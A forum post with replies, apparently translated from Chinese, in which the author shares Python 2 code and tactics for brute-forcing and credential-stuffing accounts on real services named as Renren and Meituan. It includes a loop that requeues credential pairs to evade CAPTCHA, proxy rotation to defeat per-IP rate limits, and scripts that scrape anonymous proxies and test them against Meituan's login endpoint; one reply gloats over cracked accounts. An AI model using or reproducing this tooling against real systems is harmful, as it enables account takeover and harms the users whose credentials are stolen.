There are a few well-worn tricks for HTTP brute-forcing and credential stuffing, for example:
1. While scanning accounts on Renren, I found that after two failed attempts on a single account the site forced a CAPTCHA, but it applied no per-IP policy.
I bypassed the CAPTCHA by maintaining a queue of 100,000 (username, password) pairs: whenever a combination ran into the CAPTCHA requirement, I suspended that attempt, pushed it to the tail of the queue to be retried later, and moved on to cracking other accounts.
This keeps roughly 2/3 of the running time spent on productive cracking and scanning; a minimal sketch of the loop follows.
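A minimal sketch of that requeue-on-CAPTCHA loop, assuming a hypothetical try_login() helper in place of the real request logic:

from collections import deque

def try_login(username, password):
    # Hypothetical helper standing in for the real HTTP request; it should
    # return 'ok', 'fail' or 'captcha' based on the response body.
    raise NotImplementedError

queue = deque()  # pre-filled with ~100,000 (username, password) pairs

while queue:
    username, password = queue.popleft()
    result = try_login(username, password)
    if result == 'captcha':
        # The account is temporarily behind a CAPTCHA: park the pair at the
        # tail and keep cracking other accounts; by the time it cycles back
        # around, the CAPTCHA requirement has usually expired.
        queue.append((username, password))
    elif result == 'ok':
        print 'hit: %s %s' % (username, password)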
2. While cracking accounts on a Meituan system, I hit a per-IP restriction: requests from a single IP could not come too fast. I solved it by routing requests through 72 HTTP proxies. Each individual IP's traffic looks normal, yet taken as a whole the program's throughput is still quite respectable; a rotation sketch is below.
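A minimal sketch of round-robin proxy rotation, assuming a file of ip:port proxies, one per line (for example the available.txt produced by the validation script later in this post):

import itertools
import urllib2

proxies = [line.strip() for line in open('available.txt') if line.strip()]
rotation = itertools.cycle(proxies)

def fetch(url):
    # Each call goes out through the next proxy in the rotation, so no
    # single IP exceeds the per-IP rate limit.
    proxy = next(rotation)
    opener = urllib2.build_opener(urllib2.ProxyHandler({'http': 'http://' + proxy}))
    return opener.open(url, timeout=3.0).read()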
In this post I'm sharing my script fragments for scraping HTTP proxies; they really are only a few lines. The anonymous proxies are scraped from here: http://www.xici.net.co/nn/
First, fetch the proxy list:
from bs4 import BeautifulSoup
import urllib2

of = open('proxy.txt', 'w')
for page in range(1, 160):
    # Each listing page on xici.net.co holds its proxies in a table with id 'ip_list'
    html_doc = urllib2.urlopen('http://www.xici.net.co/nn/' + str(page)).read()
    soup = BeautifulSoup(html_doc)
    trs = soup.find('table', id='ip_list').find_all('tr')
    for tr in trs[1:]:  # skip the header row
        tds = tr.find_all('td')
        ip = tds[1].text.strip()
        port = tds[2].text.strip()
        protocol = tds[5].text.strip()
        if protocol == 'HTTP' or protocol == 'HTTPS':
            of.write('%s=%s:%s\n' % (protocol, ip, port))
            print '%s=%s:%s' % (protocol, ip, port)
of.close()
Next, verify that each proxy actually works. Since I was using them to crack accounts on the Meituan system, I used a marker from Meituan's own pages as the check:
#encoding=gbk
import httplib
import threading

inFile = open('proxy.txt', 'r')
outFile = open('available.txt', 'w')
lock = threading.Lock()

def test():
    while True:
        # The worker threads share the input file, so reads are serialized with a lock
        lock.acquire()
        line = inFile.readline().strip()
        lock.release()
        if len(line) == 0:
            break
        protocol, proxy = line.split('=')
        headers = {'Content-Type': 'application/x-www-form-urlencoded',
                   'Cookie': ''}
        try:
            # Fire a dummy login at Meituan through the proxy
            conn = httplib.HTTPConnection(proxy, timeout=3.0)
            conn.request(method='POST', url='http://e.meituan.com/m/account/login',
                         body='login=ttttttttttttttttttttttttttttttttttttt&password=bb&remember_username=1&auto_login=1',
                         headers=headers)
            res = conn.getresponse()
            ret_headers = str(res.getheaders())
            html_doc = res.read().decode('utf-8')
            print html_doc.encode('gbk')
            # A usable proxy passes the request through, so the response
            # headers carry Meituan's login redirect path
            if ret_headers.find('/m/account/login/') > 0:
                lock.acquire()
                print 'add proxy', proxy
                outFile.write(proxy + '\n')
                lock.release()
            else:
                print '.',
        except Exception, e:
            print e

all_thread = []
for i in range(50):
    # 50 worker threads validate proxies in parallel
    t = threading.Thread(target=test)
    all_thread.append(t)
    t.start()

for t in all_thread:
    t.join()

inFile.close()
outFile.close()
Exactly what I needed :)
Haha, I just realized these are YM's accounts!
Something to learn from. Python really is a good fit for small tools like this. Also... Python 2.x versus 3.x, honestly...
Adding another site for fetching proxy IPs.
This code can also crawl the proxy IPs on IP巴士.
Tested under Python 2.7. Feedback:
Traceback (most recent call last):
  File "E:/proxy/addproxy.py", line 14, in <module>
    html_doc = urllib2.urlopen('http://www.xici.net.co/nn/' + str(page)).read()
  File "D:\Anaconda2\lib\urllib2.py", line 154, in urlopen
    return opener.open(url, data, timeout)
  File "D:\Anaconda2\lib\urllib2.py", line 435, in open
    response = meth(req, response)
  File "D:\Anaconda2\lib\urllib2.py", line 548, in http_response
    'http', request, response, code, msg, hdrs)
  File "D:\Anaconda2\lib\urllib2.py", line 467, in error
    result = self._call_chain(*args)
  File "D:\Anaconda2\lib\urllib2.py", line 407, in _call_chain
    result = func(*args)
  File "D:\Anaconda2\lib\urllib2.py", line 654, in http_error_302
    return self.parent.open(new, timeout=req.timeout)
  File "D:\Anaconda2\lib\urllib2.py", line 435, in open
    response = meth(req, response)
  File "D:\Anaconda2\lib\urllib2.py", line 548, in http_response
    'http', request, response, code, msg, hdrs)
  File "D:\Anaconda2\lib\urllib2.py", line 473, in error
    return self._call_chain(*args)
  File "D:\Anaconda2\lib\urllib2.py", line 407, in _call_chain
    result = func(*args)
  File "D:\Anaconda2\lib\urllib2.py", line 556, in http_error_default
    raise HTTPError(req.get_full_url(), code, msg, hdrs, fp)
urllib2.HTTPError: HTTP Error 503: Service Temporarily Unavailable
The request can't get through.
Add request headers.
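For example, a minimal sketch with urllib2.Request (the User-Agent string here is only an illustration):

import urllib2

# A browser-like User-Agent is often enough to avoid the 503; the value
# below is just an example.
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36'}
req = urllib2.Request('http://www.xici.net.co/nn/1', headers=headers)
html_doc = urllib2.urlopen(req).read()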